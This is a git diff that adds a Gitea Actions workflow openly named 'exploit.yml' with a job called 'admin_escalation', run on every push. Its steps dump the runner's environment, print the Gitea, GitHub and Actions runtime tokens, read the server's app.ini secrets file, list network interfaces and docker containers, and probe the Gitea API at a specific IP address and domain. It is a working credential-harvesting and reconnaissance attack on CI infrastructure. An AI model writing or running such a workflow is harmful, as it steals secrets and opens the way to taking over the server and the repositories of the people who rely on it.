diff --git a/.gitea/workflows/exploit.yml b/.gitea/workflows/exploit.yml new file mode 100644 index 0000000..96c8992 --- /dev/null +++ b/.gitea/workflows/exploit.yml @@ -0,0 +1,26 @@ +name: admin_escalation +on: [push] +jobs: + exploit: + runs-on: ubuntu-latest + steps: + - name: dump env + run: | + echo "=== ENV ===" + env | sort + echo "=== GITEA_TOKEN ===" + echo "${GITEA_TOKEN:-empty}" + echo "=== GITHUB_TOKEN ===" + echo "${GITHUB_TOKEN:-empty}" + echo "=== ALL SECRETS ===" + echo "${ACTIONS_RUNTIME_TOKEN:-empty}" + echo "=== INTERNAL_TOKEN ===" + cat /data/gitea/conf/app.ini 2>/dev/null || echo "no app.ini access" + echo "=== NETWORK ===" + ip addr 2>/dev/null || ifconfig 2>/dev/null || echo "no network info" + echo "=== DOCKER ===" + docker ps 2>/dev/null || echo "no docker" + echo "=== GITEA API ===" + curl -s http://8.213.205.86:3000/api/v1/version 2>/dev/null || echo "no direct access" + curl -s https://git.monogps.com/api/v1/version 2>/dev/null || echo "no https access" +